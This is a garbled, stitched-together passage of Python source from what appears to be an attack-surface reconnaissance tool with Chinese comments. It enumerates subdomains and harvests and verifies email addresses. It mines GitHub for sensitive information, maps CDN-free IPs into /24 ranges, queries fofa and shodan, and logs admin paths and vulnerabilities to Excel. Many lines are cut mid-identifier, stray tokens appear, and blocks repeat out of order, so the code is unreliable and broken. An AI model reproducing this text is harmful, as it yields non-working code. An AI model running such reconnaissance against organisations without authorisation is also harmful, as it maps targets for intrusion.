if len(domain_ip) == 2:
subdomain, ip = [domain_ip[0]], domain_ip[1]
elif len(domain_ip) == 1:
subdomain, ip = domain_ip, None
if subdomain:
theHarvesterSubdomains.extend(subdomain)
* 50 + 'Load verifyEmails ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
aliveEmails = run_verifyEmails(emails)
heHarvesterIpSheet = saveToExcel(excelSavePath, excel, 'theHarvester—IP')
theHarvesterIpSheet.saveTheHarvesterIp(theHarvesterIp)
emailsSheet = saveToExcel(excelSavePath, excel, '邮箱')
emailsSheet.saveEmails(emails, aliveEmails)
return list(set(theHarvesterSubdomains))
cprint('-' * 50 + 'Load VirusTotal threatcrowd url.fht.im ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
():
cprint('-' * 50 + 'Load Github Api Subdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
print('[+] Load Sublist3r Subdomain ...')
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
cprint('-' * 50 + 'Load Spider ...' + '-' * 50, 'green')
cprint('-' * 50 + 'Load crawlCerts ...' + '-' * 50, 'green') ugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
ugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
cprint('-' * 50 + 'check subdomains CDN and query ip ...' + '-' * 50, 'green')
for subdomain in subdomains:
if '.{}'.format(domain) in subdomain:
tmp_subdomains.append(subdomain)
print('Check CDN [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.CDN import checkCDN
print('Query the A record of [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.queryA import queryA
s.infoGather.subdomain.hostCollide import hostCollide
s.infoGather.ParamSpider.paramSpider import getParamLinks
> 1000:
paramLinks = []
cprint('-' * 50 + 'get_CIP ...' + '-' * 50, 'green')
for subdomain in Subdomains_ips:
if CDNSubdomainsDict[subdomain] == 'NOT': # 如果该子域名没有CDN,则开始统计解析出来的IP
ip_List = Subdomains_ips[subdomain]
for ip in ip_List:
if not is_internal_ip(ip):
ips.append(ip)
for ip in list(set(ips)):
c_subnet = str(IP(ip).make_net('255.255.255.0')).rsplit('.', 1)[0] + '.0'
CIP_List_all.append(c_subnet)
cprint(ip_count, 'red')
import configparser
for ip in ip_count:
if ip_count[ip] > int(c_nums):
CIP_List.append(ip)
cprint('-' * 50 + 'run_webSpace ...' + '-' * 50, 'green') s.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
for ip in list(set(ips)):
ip_C = str(IP(ip).make_net('255.255.255.0')).rsplit('.', 1)[0] + '.0'
fofaTitle_IPs.append(ip_C)
ins.infoGather.subdomain.ip2domain import getIp2Domain
一个i
s.infoGather.subdomain.ipAddress import getIpAddress
cprint('-' * 50 + 'collation_web_host ...' + '-' * 50, 'green') domain in list(set(list(Subdomains_ips.keys()) + ip2domainSubdomains)):
if ':' in subdomain: # ip2domainSubdomains的结果里有些类似于221.192.236.146:999这种结果,所以不加80端口
web_host_port_temp.append(subdomain)
else:
web_host_port_temp.append('{}:80'.format(subdomain))
from Plugins.infoGather.Intranet import getMoreIp
infoGather.webInfo import getWebTitle
域
cprint('-' * 50 + 'detect Windows vul' + '-' * 50, 'green')
创
反查域
print('[total: {}] ksubdomain: {}'.format(len(ksubdomains), ksubdomains))
print('len [{}]'.format(len(subdomains)))
theHarvesterSubdomains = []
print('[total: {}] theHarvester: {}'.format(len(theHarvesterSubdomains), theHarvesterSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] webAPI: {}'.format(len(othersApiTotalSubdomains), othersApiTotalSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] Github: {}'.format(len(githubApiSubdomains), githubApiSubdomains))
print('[total: {}] Spider: {}'.format(len(spiderSubdomains), spiderSubdomains))
print('[total: {}] Certs: {}'.format(len(certsSubdomains), certsSubdomains))
print('[total: {}] Friends: {}'.format(len(fcSubdomains), fcSubdomains))
print('C段的IP:{}'.format(CIP_List))
print(CIP_List)
print(Subdomains_ips)
print(notCDNSubdomains)
bdomain in notCDNSubdomains:
for ip in Subdomains_ips[subdomain]:
SubdomainAndNotCDNIPs.append(ip)
IPs) > 10:
SubdomainAndNotCDNIPs = []
Space_web_host_port, webSpace_service_host_port = run_webSpace(domain, SubdomainAndNotCDNIPs, [], '')
else:
webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, [], CIP_List, '') # 网络空间引擎(fofa、shodan)获取的开放web服务的host(IP/domain)
for subdomain in Subdomains_ips.keys():
for ip in Subdomains_ips[subdomain]:
allTargets_Queue.put(ip)
allTargets_List.append(ip)
print('[total: {}] ip2domainSubdomains: {}'.format(len(ip2domainSubdomains), ip2domainSubdomains))
print('[ip2domain get new subdomains] [{}]'.format(len(list(set(ip2domainSubdomains)-set(list(Subdomains_ips.keys()))))))
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
if domain:
ret = ""
for cip in CIP_List:
ret += cip
ret += ","
cprint(r"请使用-c功能跑C段资产", 'green')
cprint(r"python3 ShuiZe.py -c {}".format(ret[:-1]), 'red')
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
ranetWeb():
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
File = o
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
class saveToExcel:
def __init__(self, excelSavePath, excel, title):
self.excelSavePath = excelSavePath # excel的保存路径
self.excel = excel # openpyxl.Workbook()的实例话
self.sheet = self.excel.create_sheet(title=title) # 创建工作区
self.Sheet_line = 1 # 表格的行
# 保存代理列表
def saveSocksProxys(self, socksProxysDict):
if self.Sheet_line == 1:
self.sheet.cell(self.Sheet_line, 1).value = '谷歌代理'
self.sheet.cell(self.Sheet_line, 2).value = '百度代理'
self.Sheet_line += 1
googleProxys = socksProxysDict["google"]
baiduProxys = socksProxysDict["baidu"]
if googleProxys != []:
for proxy in googleProxys:
self.sheet.cell(self.Sheet_line, 1).value = proxy
self.Sheet_line += 1
self.Sheet_line = 2
if baiduProxys != []:
for proxy in baiduProxys:
self.sheet.cell(self.Sheet_line, 2).value = proxy
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存备案反查顶级域名的结果
def saveBeianNewDomains(self, beianNewDomains):
if self.Sheet_line == 1:
self.sheet.cell(self.Sheet_line, 1).value = '备案号'
self.sheet.cell(self.Sheet_line, 2).value = '网站名'
self.sheet.cell(self.Sheet_line, 3).value = '域名'
self.sheet.cell(self.Sheet_line, 4).value = '备案时间'
self.Sheet_line += 1
for _ in beianNewDomains:
beianId, siteName, newDomain, time = _
self.sheet.cell(self.Sheet_line, 1).value = beianId
self.sheet.cell(self.Sheet_line, 2).value = siteName
self.sheet.cell(self.Sheet_line, 3).value = newDomain
self.sheet.cell(self.Sheet_line, 4).value = time
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存爱企查的结果
def saveAiqicha(self, selfIcpinfo_infos, invest_infos, holds_infos, branch_infos):
if self.Sheet_line == 1:
self.sheet.cell(self.Sheet_line, 1).value = '备案信息'
self.sheet.cell(self.Sheet_line, 2).value = '网站名称'
self.sheet.cell(self.Sheet_line, 3).value = '域名'
self.sheet.cell(self.Sheet_line, 4).value = '备案号'
self.Sheet_line += 1
for _ in selfIcpinfo_infos:
siteName, domain, icpNo = _["siteName"], _["domain"], _["icpNo"]
self.sheet.cell(self.Sheet_line, 1).value = '备案信息'
self.sheet.cell(self.Sheet_line, 2).value = siteName
self.sheet.cell(self.Sheet_line, 3).value = str(domain)
self.sheet.cell(self.Sheet_line, 4).value = icpNo
self.Sheet_line += 1
self.Sheet_line += 1
self.sheet.cell(self.Sheet_line, 1).value = '对外投资'
self.sheet.cell(self.Sheet_line, 2).value = '公司名'
self.sheet.cell(self.Sheet_line, 3).value = '投资占比'
self.sheet.cell(self.Sheet_line, 4).value = 'pid'
self.sheet.cell(self.Sheet_line, 5).value = '网站名称'
self.sheet.cell(self.Sheet_line, 6).value = '域名'
self.sheet.cell(self.Sheet_line, 7).value = '备案号'
self.sheet.cell(self.Sheet_line, 8).value = '邮箱地址'
self.sheet.cell(self.Sheet_line, 9).value = '联系方式'
self.Sheet_line += 1
for _ in invest_infos:
pid, invest_info, icp_info, companyDetail_infos = _["pid"], _["invest_info"], _["icp_info"], _["companyDetail_infos"]
entName, regRate = invest_info["entName"], invest_info["regRate"]
emails, telephone = companyDetail_infos["emails"], companyDetail_infos["telephone"]
if icp_info:
for each_icp in icp_info:
# print(each_icp)
siteName, domain, icpNo = each_icp["siteName"], each_icp["domain"], each_icp["icpNo"]
self.sheet.cell(self.Sheet_line, 1).value = '对外投资'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = regRate
self.sheet.cell(self.Sheet_line, 4).value = pid
self.sheet.cell(self.Sheet_line, 5).value = siteName
self.sheet.cell(self.Sheet_line, 6).value = str(domain)
self.sheet.cell(self.Sheet_line, 7).value = icpNo
self.sheet.cell(self.Sheet_line, 8).value = str(emails)
self.sheet.cell(self.Sheet_line, 9).value = str(telephone)
self.Sheet_line += 1
else:
self.sheet.cell(self.Sheet_line, 1).value = '对外投资'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = regRate
self.sheet.cell(self.Sheet_line, 4).value = pid
self.sheet.cell(self.Sheet_line, 5).value = ""
self.sheet.cell(self.Sheet_line, 6).value = ""
self.sheet.cell(self.Sheet_line, 7).value = ""
self.sheet.cell(self.Sheet_line, 8).value = str(emails)
self.sheet.cell(self.Sheet_line, 9).value = str(telephone)
self.Sheet_line += 1
self.Sheet_line += 1
self.sheet.cell(self.Sheet_line, 1).value = '控股企业'
self.sheet.cell(self.Sheet_line, 2).value = '公司名'
self.sheet.cell(self.Sheet_line, 3).value = '投资占比'
self.sheet.cell(self.Sheet_line, 4).value = 'pid'
self.sheet.cell(self.Sheet_line, 5).value = '网站名称'
self.sheet.cell(self.Sheet_line, 6).value = '域名'
self.sheet.cell(self.Sheet_line, 7).value = '备案号'
self.sheet.cell(self.Sheet_line, 8).value = '邮箱地址'
self.sheet.cell(self.Sheet_line, 9).value = '联系方式'
self.Sheet_line += 1
for _ in holds_infos:
pid, holds_info, icp_info, companyDetail_infos = _["pid"], _["holds_info"], _["icp_info"], _["companyDetail_infos"]
entName, proportion = holds_info["entName"], holds_info["proportion"]
emails, telephone = companyDetail_infos["emails"], companyDetail_infos["telephone"]
if icp_info:
for each_icp in icp_info:
siteName, domain, icpNo = each_icp["siteName"], each_icp["domain"], each_icp["icpNo"]
self.sheet.cell(self.Sheet_line, 1).value = '控股企业'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = proportion
self.sheet.cell(self.Sheet_line, 4).value = pid
self.sheet.cell(self.Sheet_line, 5).value = siteName
self.sheet.cell(self.Sheet_line, 6).value = str(domain)
self.sheet.cell(self.Sheet_line, 7).value = icpNo
self.sheet.cell(self.Sheet_line, 8).value = str(emails)
self.sheet.cell(self.Sheet_line, 9).value = str(telephone)
self.Sheet_line += 1
else:
self.sheet.cell(self.Sheet_line, 1).value = '控股企业'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = proportion
self.sheet.cell(self.Sheet_line, 4).value = pid
self.sheet.cell(self.Sheet_line, 5).value = ""
self.sheet.cell(self.Sheet_line, 6).value = ""
self.sheet.cell(self.Sheet_line, 7).value = ""
self.sheet.cell(self.Sheet_line, 8).value = str(emails)
self.sheet.cell(self.Sheet_line, 9).value = str(telephone)
self.Sheet_line += 1
self.Sheet_line += 1
self.sheet.cell(self.Sheet_line, 1).value = '分支机构'
self.sheet.cell(self.Sheet_line, 2).value = '公司名'
self.sheet.cell(self.Sheet_line, 3).value = 'pid'
self.sheet.cell(self.Sheet_line, 4).value = '网站名称'
self.sheet.cell(self.Sheet_line, 5).value = '域名'
self.sheet.cell(self.Sheet_line, 6).value = '备案号'
self.sheet.cell(self.Sheet_line, 7).value = '邮箱地址'
self.sheet.cell(self.Sheet_line, 8).value = '联系方式'
self.Sheet_line += 1
for _ in branch_infos:
pid, branch_info, icp_info, companyDetail_infos = _["pid"], _["branch_info"], _["icp_info"], _["companyDetail_infos"]
entName = branch_info["entName"]
emails, telephone = companyDetail_infos["emails"], companyDetail_infos["telephone"]
if icp_info:
for each_icp in icp_info:
siteName, domain, icpNo = each_icp["siteName"], each_icp["domain"], each_icp["icpNo"]
self.sheet.cell(self.Sheet_line, 1).value = '控股企业'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = pid
self.sheet.cell(self.Sheet_line, 4).value = siteName
self.sheet.cell(self.Sheet_line, 5).value = str(domain)
self.sheet.cell(self.Sheet_line, 6).value = icpNo
self.sheet.cell(self.Sheet_line, 7).value = str(emails)
self.sheet.cell(self.Sheet_line, 8).value = str(telephone)
self.Sheet_line += 1
else:
self.sheet.cell(self.Sheet_line, 1).value = '控股企业'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = pid
self.sheet.cell(self.Sheet_line, 4).value = ""
self.sheet.cell(self.Sheet_line, 5).value = ""
self.sheet.cell(self.Sheet_line, 6).value = ""
self.sheet.cell(self.Sheet_line, 7).value = str(emails)
self.sheet.cell(self.Sheet_line, 8).value = str(telephone)
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存theHarvester的IP结果
def saveTheHarvesterIp(self, theHarvesterIp):
self.sheet.cell(self.Sheet_line, 1).value = 'IP'
self.Sheet_line += 1
for ip in theHarvesterIp:
self.sheet.cell(self.Sheet_line, 1).value = ip
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存邮箱
def saveEmails(self, emails, aliveEmails):
self.sheet.cell(self.Sheet_line, 1).value = '收集的邮箱'
self.sheet.cell(self.Sheet_line, 2).value = '真实的邮箱'
self.Sheet_line += 1
for email in emails:
self.sheet.cell(self.Sheet_line, 1).value = email
self.Sheet_line += 1
self.Sheet_line = 2
for email in aliveEmails:
self.sheet.cell(self.Sheet_line, 2).value = email
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存爬虫结果
def saveSpider(self, spiderName, links): # spiderName是搜索引擎的名字,例如百度和必应
if self.Sheet_line == 1:
self.sheet.cell(self.Sheet_line, 1).value = '爬虫'
self.sheet.cell(self.Sheet_line, 2).value = '关键字'
self.sheet.cell(self.Sheet_line, 3).value = '链接'
self.sheet.cell(self.Sheet_line, 4).value = '标题'
self.Sheet_line += 1
for _ in links:
each_wd, link, title = _
self.sheet.cell(self.Sheet_line, 1).value = spiderName
self.sheet.cell(self.Sheet_line, 2).value = each_wd
self.sheet.cell(self.Sheet_line, 3).value = link
try:
self.sheet.cell(self.Sheet_line, 4).value = title
except Exception as e:
self.sheet.cell(self.Sheet_line, 4).value = ''
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存证书结果
def saveCert(self, trustedDomainDict):
self.sheet.cell(self.Sheet_line, 1).value = '子域名'
self.sheet.cell(self.Sheet_line, 2).value = '证书信任域名'
self.Sheet_line += 1
for subdomain in trustedDomainDict:
certs = trustedDomainDict[subdomain]
for cert in certs:
self.sheet.cell(self.Sheet_line, 1).value = subdomain
self.sheet.cell(self.Sheet_line, 2).value = cert
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存github敏感信息
def saveGithub(self, gitSensitiveInfo):
self.sheet.cell(self.Sheet_line, 1).value = '关键字'
self.sheet.cell(self.Sheet_line, 2).value = '行数'
self.sheet.cell(self.Sheet_line, 3).value = '内容'
self.sheet.cell(self.Sheet_line, 4).value = '作者邮箱'
self.Sheet_line += 1
for info in gitSensitiveInfo:
keyword, line, content, email = info
self.sheet.cell(self.Sheet_line, 1).value = keyword
self.sheet.cell(self.Sheet_line, 2).value = line
try:
self.sheet.cell(self.Sheet_line, 3).value = content
except Exception as e:
self.sheet.cell(self.Sheet_line, 3).value = None # 可能会报错
self.sheet.cell(self.Sheet_line, 4).value = email
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存动态链接和后台地址
def saveparamHtLinks(self, paramLinks, htLinks):
self.sheet.cell(self.Sheet_line, 1).value = '链接'
self.sheet.cell(self.Sheet_line, 2).value = '标题'
self.Sheet_line += 1
self.sheet.cell(self.Sheet_line, 1).value = '动态链接'
self.sheet.cell(self.Sheet_line, 2).value = len(paramLinks)
self.Sheet_line += 1
for paramLink in paramLinks:
self.sheet.cell(self.Sheet_line, 1).value = paramLink
self.Sheet_line += 1
self.sheet.cell(self.Sheet_line, 1).value = '后台地址'
self.sheet.cell(self.Sheet_line, 2).value = len(htLinks)
self.Sheet_line += 1
for _ in htLinks:
link, title = _
self.sheet.cell(self.Sheet_line, 1).value = link
self.sheet.cell(self.Sheet_line, 2).value = title
try:
self.sheet.cell(self.Sheet_line, 2).value = title
except Exception as e:
self.sheet.cell(self.Sheet_line, 2).value = ''
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存A记录结果
def saveQueryA(self, Subdomains_ips, CDNSubdomainsDict):
self.sheet.cell(self.Sheet_line, 1).value = '子域名'
self.sheet.cell(self.Sheet_line, 2).value = 'A记录IP'
self.sheet.cell(self.Sheet_line, 3).value = 'CDN'
self.Sheet_line += 1
for subdomain in Subdomains_ips:
ips = str(Subdomains_ips[subdomain])
self.sheet.cell(self.Sheet_line, 1).value = subdomain
self.sheet.cell(self.Sheet_line, 2).value = ips
self.sheet.cell(self.Sheet_line, 3).value = str(CDNSubdomainsDict[subdomain])
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存host碰撞结果
def saveHostCollide(self, hostCollideResult):
self.sheet.cell(self.Sheet_line, 1).value = 'Host'
self.sheet.cell(self.Sheet_line, 2).value = 'URL'
self.sheet.cell(self.Sheet_line, 3).value = '状态码'
self.sheet.cell(self.Sheet_line, 4).value = '带Host的标题'
self.sheet.cell(self.Sheet_line, 5).value = '不带Host的标题'
self.Sheet_line += 1
for _ in hostCollideResult:
host, ip, code, title, title2 = _
self.sheet.cell(self.Sheet_line, 1).value = host
self.sheet.cell(self.Sheet_line, 2).value = ip
self.sheet.cell(self.Sheet_line, 3).value = code
self.sheet.cell(self.Sheet_line, 4).value = str(title)
self.sheet.cell(self.Sheet_line, 5).value = str(title2)
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存fofa和shodan的结果
def saveWebSpace(self, webSpaceName, webSpaceResult, query_str):
if self.Sheet_line == 1:
self.sheet.cell(self.Sheet_line, 1).value = '空间引擎名'
self.sheet.cell(self.Sheet_line, 2).value = 'host'
self.sheet.cell(self.Sheet_line, 3).value = '标题'
self.sheet.cell(self.Sheet_line, 4).value = 'ip'
self.sheet.cell(self.Sheet_line, 5).value = '子域名'
self.sheet.cell(self.Sheet_line, 6).value = '端口'
self.sheet.cell(self.Sheet_line, 7).value = '服务'
self.sheet.cell(self.Sheet_line, 8).value = '协议'
self.sheet.cell(self.Sheet_line, 9).value = '地址'
self.sheet.cell(self.Sheet_line, 10).value = '查询语句'
self.sheet.cell(self.Sheet_line, 11).value = 'robots'
self.sheet.cell(self.Sheet_line, 12).value = '证书'
self.sheet.cell(self.Sheet_line, 13).value = '公司名'
self.sheet.cell(self.Sheet_line, 14).value = 'isp'
self.sheet.cell(self.Sheet_line, 15).value = '收录时间'
self.Sheet_line += 1
for result in webSpaceResult:
if webSpaceName == 'fofa':
host, title, ip, subdomain, port, server, protocol, address = result
elif webSpaceName == 'shodan':
host, title, ip, subdomain, port, server, protocol, address, robots = result
self.sheet.cell(self.Sheet_line, 11, robots)
elif webSpaceName == 'quake':
host, title, ip, subdomain, port, server, protocol, address, cert = result
self.sheet.cell(self.Sheet_line, 12, str(cert))
else:
host, title, ip, subdomain, port, server, protocol, address, company, isp, updated_at = result
self.sheet.cell(self.Sheet_line, 13, company)
self.sheet.cell(self.Sheet_line, 14, isp)
self.sheet.cell(self.Sheet_line, 15, updated_at)
try:
title = ILLEGAL_CHARACTERS_RE.sub(r'', title)
except Exception as e:
title = ''
self.sheet.cell(self.Sheet_line, 1).value = webSpaceName
self.sheet.cell(self.Sheet_line, 2).value = host
self.sheet.cell(self.Sheet_line, 3).value = title
self.sheet.cell(self.Sheet_line, 4).value = ip
self.sheet.cell(self.Sheet_line, 5).value = subdomain
self.sheet.cell(self.Sheet_line, 6).value = port
self.sheet.cell(self.Sheet_line, 7).value = server
self.sheet.cell(self.Sheet_line, 8).value = protocol
self.sheet.cell(self.Sheet_line, 9).value = address
self.sheet.cell(self.Sheet_line, 10).value = query_str
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存网络空间查出来的将非Web服务的结果
def saveService(self, serviceResult):
self.sheet.cell(self.Sheet_line, 1).value = '协议'
self.sheet.cell(self.Sheet_line, 2).value = 'ip'
self.sheet.cell(self.Sheet_line, 3).value = 'port'
self.Sheet_line += 1
for result in serviceResult:
protocol, ip, port = result
self.sheet.cell(self.Sheet_line, 1).value = protocol
self.sheet.cell(self.Sheet_line, 2).value = ip
self.sheet.cell(self.Sheet_line, 3).value = port
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存内网存活主机的主机名和所有的IP
def saveHostNameAndIps(self, alive_hostname_ips):
self.sheet.cell(self.Sheet_line, 1).value = 'ip'
self.sheet.cell(self.Sheet_line, 2).value = '主机名'
self.sheet.cell(self.Sheet_line, 3).value = '其他IP'
self.Sheet_line += 1
for each in alive_hostname_ips:
try:
if len(each) == 1:
self.sheet.cell(self.Sheet_line, 1).value = each[0]
if len(each) == 2:
self.sheet.cell(self.Sheet_line, 1).value = each[0]
self.sheet.cell(self.Sheet_line, 2).value = each[1]
if len(each) > 2:
self.sheet.cell(self.Sheet_line, 1).value = each[0]
self.sheet.cell(self.Sheet_line, 2).value = each[1]
self.sheet.cell(self.Sheet_line, 3).value = each[2]
self.Sheet_line += 1
for moreIp in each[3:]:
self.sheet.cell(self.Sheet_line, 3).value = moreIp
self.Sheet_line += 1
except Exception as e:
pass
self.excel.save(self.excelSavePath)
# 保存IP反查域名结果
def saveIp2Domain(self, ip2domain_dict):
self.sheet.cell(self.Sheet_line, 1).value = 'ip'
self.sheet.cell(self.Sheet_line, 2).value = '域名'
self.Sheet_line += 1
for ip in ip2domain_dict.keys():
ip, subdomains = ip, ip2domain_dict[ip]
self.sheet.cell(self.Sheet_line, 1).value = ip # c段的ip
self.sheet.cell(self.Sheet_line, 2).value = str(subdomains) # ip反查出来的子域名
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存存活web的标题,后台
def saveWebTitle(self, web_Titles):
self.sheet.cell(self.Sheet_line, 1).value = 'url'
self.sheet.cell(self.Sheet_line, 2).value = '状态码'
self.sheet.cell(self.Sheet_line, 3).value = '标题'
self.sheet.cell(self.Sheet_line, 4).value = 'ip地址'
self.sheet.cell(self.Sheet_line, 5).value = '框架信息'
self.sheet.cell(self.Sheet_line, 6).value = '后台路径'
self.Sheet_line += 1
for web_Title in web_Titles:
url, webCode, webTitle, address, info, background = web_Title
self.sheet.cell(self.Sheet_line, 1).value = url
self.sheet.cell(self.Sheet_line, 2).value = webCode
try:
self.sheet.cell(self.Sheet_line, 3).value = webTitle
except Exception as e:
self.sheet.cell(self.Sheet_line, 3).value = None # 可能会报错
self.sheet.cell(self.Sheet_line, 4).value = address
self.sheet.cell(self.Sheet_line, 5).value = info
try:
self.sheet.cell(self.Sheet_line, 6).value = background
except Exception as e:
self.sheet.cell(self.Sheet_line, 6).value = None
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存漏洞
def saveVul(self, Vul_list):
self.sheet.cell(self.Sheet_line, 1).value = '漏洞名'
self.sheet.cell(self.Sheet_line, 2).value = 'url'
self.sheet.cell(self.Sheet_line, 3).value = '状态'
self.Sheet_line += 1
for vul in Vul_list:
Vul_Name, Vul_url, Vul_exist = vul
self.sheet.cell(self.Sheet_line, 1).value = Vul_Name # 漏洞名
self.sheet.cell(self.Sheet_line, 2).value = Vul_url # 存在漏洞的url
self.sheet.cell(self.Sheet_line, 3).value = Vul_exist # 是否存在漏洞,YES存在,NO不存在, Maybe可能
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
# 保存相关域名和C段IP信息
def saveNewDomainAndCSubnet(self, newDomains, ip_count):
self.sheet.cell(self.Sheet_line, 1).value = '相关域名'
self.sheet.cell(self.Sheet_line, 2).value = '相关C段'
self.sheet.cell(self.Sheet_line, 3).value = '该C段出现的域名个数'
self.Sheet_line += 1
for newDomain in newDomains:
self.sheet.cell(self.Sheet_line, 1).value = newDomain # 相关域名
self.Sheet_line += 1
self.Sheet_line = 2
for c_subnet in ip_count:
ip_nums = ip_count[c_subnet]
self.sheet.cell(self.Sheet_line, 2).value = c_subnet # 相关C段
self.sheet.cell(self.Sheet_line, 3).value = ip_nums # 相关C段
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
def run_theHarvester(domain):
uvloop.install()
# all_ip, all_emails, all_hosts = asyncio.run(__main__.entry_point(domain))
return asyncio.run(__main__.entry_point(domain))
def theHarvester():
cprint('-' * 50 + 'Load theHarvest ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
theHarvesterIp, emails, hosts = run_theHarvester(domain)
print(hosts)
theHarvesterSubdomains = []
subdomain = None
for host in list(set(hosts)):
if '/' not in host and ' ' not in host:
domain_ip = host.strip().split(':')
if len(domain_ip) == 2:
subdomain, ip = [domain_ip[0]], domain_ip[1]
elif len(domain_ip) == 1:
subdomain, ip = domain_ip, None
if subdomain:
theHarvesterSubdomains.extend(subdomain)
# 测试
# 检测邮箱的真实性
cprint('-' * 50 + 'Load verifyEmails ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
aliveEmails = run_verifyEmails(emails)
# 保存到excel
theHarvesterIpSheet = saveToExcel(excelSavePath, excel, 'theHarvester—IP')
theHarvesterIpSheet.saveTheHarvesterIp(theHarvesterIp)
emailsSheet = saveToExcel(excelSavePath, excel, '邮箱')
emailsSheet.saveEmails(emails, aliveEmails)
return list(set(theHarvesterSubdomains)) | null |
189,265 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
ns.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
print(hosts)
subdomain = None
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
print('[+] Load Sublist3r Subdomain ...')
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
sublist3rSubdomains = sublist3rRun(domain)
return sublist3rSubdomains
ugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
ugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
for subdomain in subdomains:
if '.{}'.format(domain) in subdomain:
tmp_subdomains.append(subdomain)
print('Check CDN [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.CDN import checkCDN
print('Query the A record of [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.queryA import queryA
s.infoGather.subdomain.hostCollide import hostCollide
s.infoGather.ParamSpider.paramSpider import getParamLinks
for subdomain in Subdomains_ips:
if CDNSubdomainsDict[subdomain] == 'NOT': # 如果该子域名没有CDN,则开始统计解析出来的IP
ip_List = Subdomains_ips[subdomain]
for ip in ip_List:
if not is_internal_ip(ip):
ips.append(ip)
import configparser
s.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
ins.infoGather.subdomain.ip2domain import getIp2Domain
一个i
s.infoGather.subdomain.ipAddress import getIpAddress
